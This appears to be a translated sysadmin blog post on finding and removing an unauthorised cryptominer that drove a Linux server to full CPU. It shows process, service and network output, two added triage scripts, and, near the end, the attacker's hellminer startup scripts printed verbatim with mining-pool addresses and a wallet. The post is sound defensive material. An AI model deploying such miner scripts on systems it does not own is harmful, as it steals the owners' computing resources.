CPU at 100%: it turned out someone else's miner was using it

Bismilaahirrohmaanirrohiim…

If someone is using your server for mining, their miner will consume all of the CPU, and as a result the server becomes very slow.

To check, you can use the command

htop

To see which processes use the most CPU:

ps aux --sort=-%cpu | head -20
root     365968 96.0  0.0  92196  2040 ?        Rl   Aug29 7966:36 verus-solver --cpu 0
root     365967 95.9  0.0  92196  2056 ?        Rl   Aug29 7965:16 verus-solver --cpu 3
root     365969 95.9  0.0  92196  2068 ?        Rl   Aug29 7965:16 verus-solver --cpu 2
root     365970 95.9  0.0  92196  1992 ?        Rl   Aug29 7965:15 verus-solver --cpu 1
mysql      1093 10.8  5.1 2827872 405732 ?      Ssl  Aug13 3409:05 /usr/libexec/mysqld --basedir=/usr
root        676  0.9  0.0      0     0 ?        S<   Aug13 308:15 [loop0]
root     934181  0.3  0.0 264564  6088 pts/0    S+   00:47   0:00 htop
root     933514  0.2  0.0      0     0 ?        I    00:33   0:02 [kworker/u8:0-events_unbound]
root         10  0.1  0.0      0     0 ?        S    Aug13  50:41 [ksoftirqd/0]

The process name turns out to be "verus-solver", although that is not the name of the service that starts it.


Check the services that are running and look for anything suspicious, especially among those enabled at startup

systemctl list-unit-files --type=service | grep enabled

[root@ns1 ~]# systemctl list-unit-files --type=service | grep enabled
auditd.service                                enabled
autovt@.service                               enabled
chronyd.service                               enabled
cloud-config.service                          enabled
cloud-final.service                           enabled
cloud-init-local.service                      enabled
cloud-init.service                            enabled
cpecs.service                                 enabled
crond.service                                 enabled
dbus-org.fedoraproject.FirewallD1.service     enabled
dbus-org.freedesktop.nm-dispatcher.service    enabled
dbus-org.freedesktop.timedate1.service        enabled
dovecot.service                               enabled
firewalld.service                             enabled
getty@.service                                enabled
hellminer.service                             enabled
import-state.service                          enabled
irqbalance.service                            enabled
kdump.service                                 enabled
loadmodules.service                           enabled
lscpd.service                                 enabled
lshttpd.service                               enabled
lsws.service                                  enabled
mariadb.service                               enabled
mysql.service                                 enabled
mysqld.service                                enabled
NetworkManager-dispatcher.service             enabled
NetworkManager-wait-online.service            enabled
NetworkManager.service                        enabled
nis-domainname.service                        enabled
opendkim.service                              enabled
openlitespeed.service                         enabled
pdns.service                                  enabled
postfix.service                               enabled
pure-ftpd.service                             enabled
qemu-guest-agent.service                      enabled
rc-local.service                              enabled-runtime
redis.service                                 enabled
rsyslog.service                               enabled
selinux-autorelabel-mark.service              enabled
sshd.service                                  enabled
sssd.service                                  enabled
syslog.service                                enabled
sysstat.service                               enabled
systemd-fsck-root.service                     enabled-runtime
timedatex.service                             enabled
tuned.service                                 enabled


The list will be long; in it we find the name: hellminer.service

Check netstat

netstat -tnp | grep ESTABLISHED

tcp        0      0 172.104.164.36:22       113.11.181.209:41833    ESTABLISHED 934383/sshd: root [
tcp        0      0 172.104.164.36:40868    139.99.16.105:5040      ESTABLISHED 766320/hellminer
tcp        0      0 172.104.164.36:22       113.11.181.209:40421    ESTABLISHED 934272/sshd: root [
tcp        0    544 172.104.164.36:22       113.11.181.209:38827    ESTABLISHED 934116/sshd: root [
tcp        3      0 172.104.164.36:465      206.168.34.45:33774     ESTABLISHED -
tcp        0      0 172.104.164.36:51664    193.219.97.14:443       ESTABLISHED 6494/[kswapd0]
tcp        0     51 172.104.164.36:443      98.83.177.42:56678      ESTABLISHED 459613/openlitespee
tcp        0      0 172.104.164.36:22       113.11.181.209:28737    ESTABLISHED 933174/sshd: root 

Miners usually connect to a pool overseas (ports 3333, 4444, 5555); in the output above, the hellminer process holds a connection to port 5040. Once you find one, do not just kill the process: delete the binary/script and disable the cron job or systemd service that launches it.
If there are many suspicious results, the system has been fully taken over; the best advice is still to reinstall a clean OS after the data has been safely backed up.
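A way to triage the netstat listing instead of reading it by eye, as an added example that is not part of the original post. The allowlist, the ephemeral-port threshold and the sample lines (documentation IP ranges) are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): triage `netstat -tnp` output.
# Reads netstat lines on stdin, prints "REASON pid/name local -> remote".
#   KTHREAD-NAME  program column looks like "[kswapd0]". Kernel threads hold
#                 no file descriptors that netstat -p can attribute, so a
#                 bracketed name belongs to a userland process imitating one.
#   OUTBOUND      local port is ephemeral (>= 32768, Linux default range) and
#                 the program is not on the allowlist below (assumed list).
ALLOW_OUTBOUND="${ALLOW_OUTBOUND:-postfix chronyd dnf curl}"

flag_connections() {
    awk -v allow="$ALLOW_OUTBOUND" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 ~ /^tcp/ && $6 == "ESTABLISHED" {
        prog = $7
        if (prog == "-" || prog == "") next      # owner not visible
        name = prog; sub(/^[0-9]+\//, "", name)  # "766320/hellminer" -> "hellminer"
        lport = $4; sub(/.*:/, "", lport)
        if (name ~ /^\[.*\]$/) { print "KTHREAD-NAME", prog, $4, "->", $5; next }
        sub(/:.*/, "", name)                     # "sshd:" -> "sshd"
        if (lport + 0 >= 32768 && !(name in ok)) print "OUTBOUND", prog, $4, "->", $5
    }'
}

# Constructed sample modelled on the output above (documentation IP ranges).
sample_netstat() {
    cat <<'EOF'
tcp        0      0 192.0.2.10:22        198.51.100.7:41833   ESTABLISHED 934383/sshd: root [
tcp        0      0 192.0.2.10:40868     203.0.113.5:5040     ESTABLISHED 766320/hellminer
tcp        3      0 192.0.2.10:465       198.51.100.9:33774   ESTABLISHED -
tcp        0      0 192.0.2.10:51664     203.0.113.14:443     ESTABLISHED 6494/[kswapd0]
tcp        0     51 192.0.2.10:443       198.51.100.42:56678  ESTABLISHED 459613/openlitespee
EOF
}

sample_netstat | flag_connections
# On a live host: netstat -tnp | flag_connections
```

Every flagged PID should be traced back to its binary and to whatever launches it before anything is killed.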

Remediation

First, check the service

systemctl status hellminer.service

hellminer.service - Hellminer Service
   Loaded: loaded (/etc/systemd/system/hellminer.service; enabled; vendor preset: disabled)
   Active: active (running) since Sat 2025-08-23 08:29:33 UTC; 1 weeks 4 days ago
 Main PID: 766318 (start-hellminer)
    Tasks: 12 (limit: 49498)
   Memory: 30.9M
   CGroup: /system.slice/hellminer.service
           ├─365967 verus-solver --cpu 3
           ├─365968 verus-solver --cpu 0
           ├─365969 verus-solver --cpu 2
           ├─365970 verus-solver --cpu 1
           ├─766318 /bin/bash /home/tings/miner/start-hellminer.sh
           ├─766319 /home/tings/miner/hellminer -c stratum+tcp://sg.vipor.net:5040 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4
           └─766320 /home/tings/miner/hellminer -c stratum+tcp://sg.vipor.net:5040 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4

Sep 04 01:00:49 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38728 [10 ms]
Sep 04 01:00:49 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38729 [11 ms]
Sep 04 01:00:54 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38730 [10 ms]
Sep 04 01:01:10 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38731 [10 ms]
Sep 04 01:01:28 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38732 [2 ms]
Sep 04 01:01:32 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38733 [10 ms]
Sep 04 01:01:34 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38734 [11 ms]
Sep 04 01:01:37 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38735 [11 ms]
Sep 04 01:02:14 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38736 [10 ms]
Sep 04 01:02:17 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38737 [9 ms]

Now we know where it lives; all that is left is to act

systemctl stop hellminer.service

Disable the service's autostart at boot

systemctl disable hellminer.service

If you want it gone completely (delete the service file):
rm -f /etc/systemd/system/hellminer.service
systemctl daemon-reload

Done.
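To check that no other unit of the same kind remains, the following added example (not part of the original post) lists service units whose Exec lines run something from a user-writable tree, the way hellminer.service runs /home/tings/miner/start-hellminer.sh. The prefix list and the demo unit files are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): list service units that launch
# something from a user-writable tree. The prefix list is an assumption;
# extend it as needed.
# Usage: audit_units DIR...   Output: "<unit file><TAB><flagged path>"
audit_units() {
    for dir in "$@"; do
        for unit in "$dir"/*.service; do
            [ -f "$unit" ] || continue           # unmatched glob or missing dir
            awk -v u="$unit" '
            /^Exec(Start|StartPre|StartPost)=/ {
                cmd = $0; sub(/^[^=]*=/, "", cmd)
                sub(/^[-@:+!]+/, "", cmd)        # strip systemd exec prefixes
                n = split(cmd, w, /[ \t]+/)
                for (i = 1; i <= n; i++) {
                    # any argument counts, e.g. "/bin/bash /home/.../start.sh"
                    if (w[i] ~ /^\/(home|root|tmp|var\/tmp|dev\/shm)\//) {
                        print u "\t" w[i]; break
                    }
                }
            }' "$unit"
        done
    done
}

# Constructed demo: two unit files in a scratch directory.
demo_audit() {
    d=$(mktemp -d) || return 1
    printf '[Service]\nExecStart=/usr/sbin/sshd -D\n' > "$d/sshd.service"
    printf '[Service]\nExecStart=/bin/bash /home/user/miner/start.sh\n' > "$d/example-miner.service"
    audit_units "$d" | sed "s|^$d/||"
    rm -rf "$d"
}

demo_audit
# On a live host: audit_units /etc/systemd/system /usr/lib/systemd/system
```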

Below is an example of the contents of the miner's startup files

Miner files:
located in /root/miner/
start-hellminer.sh
#!/bin/bash
cd /root/miner
export TMPDIR=/root/miner/tmpdir

# Run hellminer with the maximum number of threads
/root/miner/hellminer -c stratum+tcp://na.luckpool.net:3956 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4

/home/tings/miner/start-hellminer.sh
#!/bin/bash
cd /home/tings/miner
export TMPDIR=/home/tings/miner/tmpdir

# Run hellminer with the maximum number of threads
/home/tings/miner/hellminer -c stratum+tcp://sg.vipor.net:5040 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4

That is all; hopefully this is useful.

About the Author: rasupe
